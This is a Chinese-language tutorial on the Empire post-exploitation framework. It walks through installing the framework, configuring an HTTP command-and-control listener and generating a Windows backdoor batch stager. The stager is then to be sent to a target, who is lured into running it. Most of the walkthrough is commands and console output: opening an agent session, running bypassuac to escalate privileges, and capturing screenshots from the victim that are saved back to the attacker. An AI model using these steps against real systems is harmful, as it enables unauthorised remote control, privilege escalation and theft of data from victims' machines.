後滲透神器Empire的簡單使用

一、安裝

---

1.一、系統環境：

---

• Debian系Linux：例如Ubuntu和Kali（本文使用Kali做爲環境）

  1.二、安裝命令：

  ---

  安裝最後須要輸入用戶名、密碼

wget https://raw.githubusercontent.com/backlion/demo/master/Empire-master.zip
unzip Empire-master.zip
cd  Empire-master
cd setup/
./install.sh

1.三、測試啓動

root@kali:~# cd Empire
root@kali:~/Empire# ./empire

二、使用

---

2.一、基本使用

---

#查詢命令help
(Empire) > help

2.二、建立一個監聽器

---

• tips1 列舉可使用tab補全
• tips2 監聽模塊介紹

*  http[s]，用http[s]進行交互。
*  http_com，使用IE的COM組件進行交互。
*  http_foreign，這個跟http看不出差異在哪。
*  http_hop，接收到的請求轉發到其餘的listener，猜想用於C2。
*  dbx/onedrive，使用dropbox或者onedrive做爲信息傳遞的中介，相似QQ空間上線或者weibo上線的遠控。
*  http_mapi，經過郵件上線。
*  meterpreter，就很少說了，你們都知道的。

• tips3 咱們使用http進行監聽做爲這次演示的模塊

(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener
dbx           http          http_com      http_foreign  http_hop      http_mapi     meterpreter   onedrive      redirector
(Empire: listeners) > uselistener http
(Empire: listeners/http) >

因而就建立好了一個沒有作任何配置的監聽器

2.三、配置監聽器

---

和msf仍是很相似的，info查看配置，set配置選項值

(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > set Name monitor
(Empire: listeners/http) > info

    Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  SlackToken        False                                        Your SlackBot API token to communicate with your Slack instance.
  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        monitor                          Name for the listener.
  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  SlackChannel      False       #general                         The Slack channel or DM that notifications will be sent to.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Host              True        http://172.16.204.143:80         Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  Proxy             False       default                          Proxy to use for request (default, none, or other).
  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).
  StagingKey        True        63a9f0ea7bb98050796b649e85481845 Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  Port              True        8080                             Port for the listener.
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php


(Empire: listeners/http) >

2.四、啓動監聽器

---

(Empire) > execute

2.五、生成後門文件

---

經過usestager來生成文件，引誘對方運行，能夠看到支持linux、Windows、osx

Empire: listeners) > usestager windows/
backdoorLnkMacro  csharp_exe        ducky             launcher_bat      launcher_sct      launcher_xml      macroless_msword  teensy
bunny             dll               hta               launcher_lnk      launcher_vbs      macro             shellcode
(Empire: listeners) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > info

進行一波配置

• tips1 名字要與監聽器的名字一致哦

(Empire: stager/windows/launcher_bat) > set Listener monitor
(Empire: stager/windows/launcher_bat) > execute

生成的文件如圖

三、發送給目標執行

---

3.一、運行後獲取到鏈接

---

無論怎麼運行的，反正shell回來了

(Empire: agents) > agents

3.二、進行回連並嘗試bypassuac

---

(Empire: agents) > interact 29F438CA
(Empire: 29F438CA) >
(Empire: 29F438CA) > bypassuac monitor

3.三、一些操做

---

• 3.3.一、屏幕截圖

(Empire: 29F438CA) > sc
[*] Tasked 29F438CA to run TASK_CMD_WAIT_SAVE
[*] Agent 29F438CA tasked with task ID 2
[*] Tasked agent 29F438CA to run module powershell/collection/screenshot
(Empire: 29F438CA) > [+] File screenshot/CLIENT_2019-03-16_11-30-01.png from 29F438CA saved
[*] Agent 29F438CA returned results.
Output saved to ./downloads/29F438CA/screenshot/CLIENT_2019-03-16_11-30-01.png
[*] Valid results returned by 172.16.204.80

• 3.3.二、查看能夠用的模塊

(Empire: 29F438CA) > usemodule

• 3.3.三、查看agents下的命令

(Empire: 29F438CA) > help agentcmds

• 3.3.四、運行ipconig做爲例子

(Empire: 29F438CA) > ipconfig

• 3.3.五、輸入help查看命令，不是shellcmd，而是agent下的指令哦

(Empire: 29F438CA) > help

指令有啥做用一看就懂，尤爲是作過滲透，就不贅述了